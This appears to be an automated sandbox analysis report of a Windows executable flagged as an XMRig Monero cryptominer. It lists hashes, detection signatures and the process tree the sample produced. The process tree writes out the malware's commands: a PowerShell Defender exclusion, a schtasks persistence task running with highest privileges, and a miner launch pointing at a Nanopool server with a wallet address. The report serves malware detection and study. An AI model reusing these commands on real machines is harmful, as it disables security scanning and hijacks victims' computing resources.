Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    08/03/2023, 10:33

General

  • Target

    8f33cfb97b5f36eea3f1dcee4d97687c9da0d589b2b92f1eeedd3a78d69af779.exe

  • Size

    1.8MB

  • MD5

    4b866d4b907abbedaaa880cf42770ccc

  • SHA1

    fa41d4fe2c1136e6e893a720eb48b1c54406ded1

  • SHA256

    8f33cfb97b5f36eea3f1dcee4d97687c9da0d589b2b92f1eeedd3a78d69af779

  • SHA512

    6626a59393f2c1a9451a8bd7ebcd28f34f47b3336347b4e18a5078ea5a5d6df4f37bd6221d1f3356f36e1c473ae5e060771a64fe42c77c14fd478cca6d9bf1d7

  • SSDEEP

    49152:RHTAe3RCj7aXT2883eGoIQXCCCsEnvLcS2:RzAeBg7aCf3eGoINCCsEnTO

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8f33cfb97b5f36eea3f1dcee4d97687c9da0d589b2b92f1eeedd3a78d69af779.exe
    "C:\Users\Admin\AppData\Local\Temp\8f33cfb97b5f36eea3f1dcee4d97687c9da0d589b2b92f1eeedd3a78d69af779.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1416
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CARWD" /tr "C:\ProgramData\Package\CARWD.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CARWD" /tr "C:\ProgramData\Package\CARWD.exe"
        3⤵
        • Creates scheduled task(s)
        PID:536
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:824

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/824-194-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1416-86-0x000000001B210000-0x000000001B4F2000-memory.dmp

    Filesize

    2.9MB

  • memory/1416-92-0x00000000029BB000-0x00000000029F2000-memory.dmp

    Filesize

    220KB

  • memory/1416-91-0x00000000029B0000-0x0000000002A30000-memory.dmp

    Filesize

    512KB

  • memory/1416-90-0x00000000029B0000-0x0000000002A30000-memory.dmp

    Filesize

    512KB

  • memory/1416-89-0x00000000029B0000-0x0000000002A30000-memory.dmp

    Filesize

    512KB

  • memory/1416-87-0x0000000002360000-0x0000000002368000-memory.dmp

    Filesize

    32KB

  • memory/1532-71-0x000007FEFF230000-0x000007FEFF30B000-memory.dmp

    Filesize

    876KB

  • memory/1532-94-0x0000000077780000-0x0000000077929000-memory.dmp

    Filesize

    1.7MB

  • memory/1532-67-0x0000000000380000-0x000000000053C000-memory.dmp

    Filesize

    1.7MB

  • memory/1532-69-0x000007FEFF630000-0x000007FEFF6A1000-memory.dmp

    Filesize

    452KB

  • memory/1532-70-0x000007FEFAD70000-0x000007FEFAE67000-memory.dmp

    Filesize

    988KB

  • memory/1532-56-0x00000000002F0000-0x0000000000332000-memory.dmp

    Filesize

    264KB

  • memory/1532-72-0x000007FEF5B90000-0x000007FEF657C000-memory.dmp

    Filesize

    9.9MB

  • memory/1532-73-0x000007FEFDA00000-0x000007FEFDB2D000-memory.dmp

    Filesize

    1.2MB

  • memory/1532-74-0x000007FEFF420000-0x000007FEFF623000-memory.dmp

    Filesize

    2.0MB

  • memory/1532-75-0x0000000000380000-0x000000000053C000-memory.dmp

    Filesize

    1.7MB

  • memory/1532-76-0x000007FEF6F10000-0x000007FEF703C000-memory.dmp

    Filesize

    1.2MB

  • memory/1532-77-0x000007FEFCF10000-0x000007FEFCF32000-memory.dmp

    Filesize

    136KB

  • memory/1532-78-0x000007FEFCDC0000-0x000007FEFCDD7000-memory.dmp

    Filesize

    92KB

  • memory/1532-68-0x00000000002F0000-0x0000000000332000-memory.dmp

    Filesize

    264KB

  • memory/1532-65-0x0000000077560000-0x000000007767F000-memory.dmp

    Filesize

    1.1MB

  • memory/1532-88-0x000000001BD70000-0x000000001BDF0000-memory.dmp

    Filesize

    512KB

  • memory/1532-64-0x000007FEFF190000-0x000007FEFF22F000-memory.dmp

    Filesize

    636KB

  • memory/1532-63-0x0000000077680000-0x000000007777A000-memory.dmp

    Filesize

    1000KB

  • memory/1532-62-0x000007FEFFA20000-0x000007FEFFA87000-memory.dmp

    Filesize

    412KB

  • memory/1532-81-0x000007FEFDB30000-0x000007FEFDC07000-memory.dmp

    Filesize

    860KB

  • memory/1532-61-0x000007FEFB090000-0x000007FEFB12C000-memory.dmp

    Filesize

    624KB

  • memory/1532-66-0x000007FEFD800000-0x000007FEFD86C000-memory.dmp

    Filesize

    432KB

  • memory/1532-95-0x0000000077560000-0x000000007767F000-memory.dmp

    Filesize

    1.1MB

  • memory/1532-96-0x000007FEFD800000-0x000007FEFD86C000-memory.dmp

    Filesize

    432KB

  • memory/1532-97-0x000007FEFF190000-0x000007FEFF22F000-memory.dmp

    Filesize

    636KB

  • memory/1532-98-0x000007FEFF630000-0x000007FEFF6A1000-memory.dmp

    Filesize

    452KB

  • memory/1532-101-0x000007FEFB130000-0x000007FEFB19F000-memory.dmp

    Filesize

    444KB

  • memory/1532-102-0x000007FEFF230000-0x000007FEFF30B000-memory.dmp

    Filesize

    876KB

  • memory/1532-103-0x000007FEFDA00000-0x000007FEFDB2D000-memory.dmp

    Filesize

    1.2MB

  • memory/1532-104-0x000007FEFB090000-0x000007FEFB12C000-memory.dmp

    Filesize

    624KB

  • memory/1532-105-0x000007FEFC690000-0x000007FEFC69C000-memory.dmp

    Filesize

    48KB

  • memory/1532-106-0x000007FEF5B90000-0x000007FEF657C000-memory.dmp

    Filesize

    9.9MB

  • memory/1532-107-0x000007FEFAD70000-0x000007FEFAE67000-memory.dmp

    Filesize

    988KB

  • memory/1532-108-0x000007FEFF420000-0x000007FEFF623000-memory.dmp

    Filesize

    2.0MB

  • memory/1532-109-0x000007FEFBDE0000-0x000007FEFBDE3000-memory.dmp

    Filesize

    12KB

  • memory/1532-110-0x000007FEF6F10000-0x000007FEF703C000-memory.dmp

    Filesize

    1.2MB

  • memory/1532-111-0x000007FEFB460000-0x000007FEFB476000-memory.dmp

    Filesize

    88KB

  • memory/1532-113-0x000007FEFCDC0000-0x000007FEFCDD7000-memory.dmp

    Filesize

    92KB

  • memory/1532-115-0x00000000002F0000-0x0000000000332000-memory.dmp

    Filesize

    264KB

  • memory/1532-138-0x000000001BD70000-0x000000001BDF0000-memory.dmp

    Filesize

    512KB

  • memory/1532-60-0x000007FEFB130000-0x000007FEFB19F000-memory.dmp

    Filesize

    444KB

  • memory/1532-267-0x0000000000380000-0x000000000053C000-memory.dmp

    Filesize

    1.7MB